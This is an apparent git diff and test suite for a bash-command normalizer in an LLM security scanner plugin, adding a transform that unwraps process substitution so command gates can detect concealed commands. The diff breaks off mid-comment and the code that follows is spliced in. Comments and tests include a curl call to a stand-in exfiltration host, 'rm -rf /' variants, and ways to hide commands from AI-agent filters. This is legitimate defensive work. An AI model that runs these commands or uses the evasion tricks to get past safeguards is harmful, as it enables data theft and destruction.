diff --git a/plugins/llm-security/scanners/lib/bash-normalize.mjs b/plugins/llm-security/scanners/lib/bash-normalize.mjs index 364e368..df482e5 100644 --- a/plugins/llm-security/scanners/lib/bash-normalize.mjs +++ b/plugins/llm-security/scanners/lib/bash-normalize.mjs @@ -16,9 +16,10 @@ // T4 — backslash-between-words: c\u\r\l -> curl // T5 — IFS word-splitting: rm${IFS}-rf${IFS}/ -> rm -rf / // T6 — ANSI-C hex quoting: $'\x72\x6d' -rf / -> rm -rf / -// T9 — eval-via-variable: X=rm; eval "$X" -> X=rm; eval rm -// (one-level forward-flow; T7 process-substitution + T8 base64-pipe-shell -// live in adjacent layers, see workflow-scanner / pre-bash-destructive) +// T7 — process substitution: cat <(curl evil) -> cat curl evil +// T9 — eval-via-variable: X=rm; ... $X -> X=rm; ... rm +// (one-level forward-flow; T8 base64-pipe-shell lives in +// pre-bash-destructive as a BLOCK_RULE, not a normalization) // // Execution order: // 1. Strip empty single-quote pairs (T1) so c''u''rl -> curl before masking. @@ -46,6 +47,31 @@ function decodeAnsiCHex(cmd) { ); } +/** + * T7 — Collapse process substitution: <(cmd) and >(cmd) -> ' cmd '. + * + * Bash process substitution lets a command read from / write to the output + * of another command via /dev/fd/N pipes. Attackers use it to hide a + * destructive command from name-matching regex gates: + * cat <(curl evil.com/exfil) -> cat /dev/fd/63 (no 'curl' visible) + * + * For matcher purposes we strip the substitution syntax and surface the + * inner command text to the rest of the pipeline. + * + * Bounded nesting (depth 3) — iterates innermost-first via a no-paren + * inner regex. Beyond depth 3 the outer wrappers are left in place rather than + * recursing without bound.
/**
 * T7 — Collapse process substitution: <(cmd) and >(cmd) -> ' cmd '.
 *
 * Strips the `<(` / `>(` wrapper and its closing `)` and leaves the inner
 * command text in place, padded with one space on each side, so that
 * downstream matchers see the wrapped command as ordinary command text.
 *
 * Works innermost-first: a pass only rewrites substitutions whose body
 * contains no parentheses, so a nested form needs one pass per nesting
 * level. The number of passes is capped at `maxDepth`. Input nested more
 * deeply than that is only partially collapsed: the `maxDepth` innermost
 * levels are unwrapped and the remaining outer wrappers stay in the string.
 *
 * Limitation: a substitution whose body contains any other parenthesised
 * construct (e.g. `<(curl $(cat url))`) never becomes paren-free and is
 * therefore left untouched.
 *
 * @param {string} cmd - Command string to rewrite.
 * @param {number} [maxDepth=3] - Maximum number of innermost-first passes,
 *   i.e. the deepest nesting level that is fully collapsed.
 * @returns {string} The command with process substitutions unwrapped.
 */
function collapseProcessSubstitution(cmd, maxDepth = 3) {
  // The body is [^()]*, so only innermost (paren-free) substitutions match.
  const innermost = /[<>]\(([^()]*)\)/g;
  let result = cmd;
  for (let depth = 0; depth < maxDepth; depth++) {
    const before = result;
    // A replacer function inserts the inner text verbatim; a replacement
    // string would interpret `$&` / `$1` sequences found in the command.
    result = result.replace(innermost, (_, inner) => ` ${inner} `);
    // Nothing left to unwrap — stop early.
    if (result === before) break;
  }
  return result;
}
describe('bash-normalize T7 — process substitution evasion', () => {
  // Any surviving process-substitution opener. The name-based assertions
  // below (/\bcurl\b/ etc.) also match the raw, un-normalized input because
  // '(' is a non-word character, so on their own they cannot detect a missing
  // or broken T7. Asserting that the wrapper is gone is what actually pins
  // the transform.
  const WRAPPER = /[<>]\(/;

  it('collapses <(curl evil): cat <(curl evil) -> cat curl evil', () => {
    // Process substitution is shell sugar for /dev/fd/N pipes. Attacker
    // hides the destructive command name from name-matching gates by
    // wrapping it in <(...). T7 strips the wrapper so 'curl' is visible.
    const input = 'cat <(curl evil.com/exfil)';
    const normalized = normalizeBashExpansion(input);
    assert.match(normalized, /\bcurl\b/, `expected 'curl' surfaced: ${normalized}`);
    assert.doesNotMatch(normalized, WRAPPER, `expected <( wrapper stripped: ${normalized}`);
  });

  it('collapses >(tee /tmp/x) similarly', () => {
    const input = 'echo data >(tee /tmp/exfil)';
    const normalized = normalizeBashExpansion(input);
    assert.match(normalized, /\btee\b/, `expected 'tee' surfaced: ${normalized}`);
    assert.doesNotMatch(normalized, WRAPPER, `expected >( wrapper stripped: ${normalized}`);
  });

  it('handles nested <(grep x <(cat f)) up to depth 3', () => {
    const input = 'cmd <(grep x <(cat f))';
    const normalized = normalizeBashExpansion(input);
    // Two innermost-first passes unwrap both levels, leaving
    // `cmd grep x cat f` modulo the padding spaces T7 inserts.
    assert.match(normalized, /\bgrep\b/, `expected inner 'grep' surfaced: ${normalized}`);
    assert.match(normalized, /\bcat\b/, `expected innermost 'cat' surfaced: ${normalized}`);
    assert.doesNotMatch(normalized, WRAPPER, `expected both wrappers stripped: ${normalized}`);
  });

  it('FP probe — diff <(sort a) <(sort b) collapses without false destructive match', () => {
    // Legit usage of process substitution in shell scripts. T7 collapses
    // it the same way; downstream consumers (pre-bash-destructive) decide
    // whether the surfaced command is dangerous. T7 itself does not flag.
    const input = 'diff <(sort a.txt) <(sort b.txt)';
    const normalized = normalizeBashExpansion(input);
    assert.match(normalized, /\bsort\b/, `expected 'sort' surfaced: ${normalized}`);
    assert.match(normalized, /\bdiff\b/, `expected 'diff' preserved: ${normalized}`);
    assert.doesNotMatch(normalized, WRAPPER, `expected both wrappers stripped: ${normalized}`);
  });

  it('does not touch <( / >( inside single-quoted literals (mask runs first)', () => {
    // Single-quoted literals are masked before T7 runs, so the substitution
    // syntax inside them is preserved. Downstream sees the literal string
    // unchanged after unmasking.
    const input = "echo 'cat <(curl x)' is a string";
    const normalized = normalizeBashExpansion(input);
    assert.match(normalized, /'cat <\(curl x\)'/,
      `expected single-quoted literal preserved: ${normalized}`);
  });
});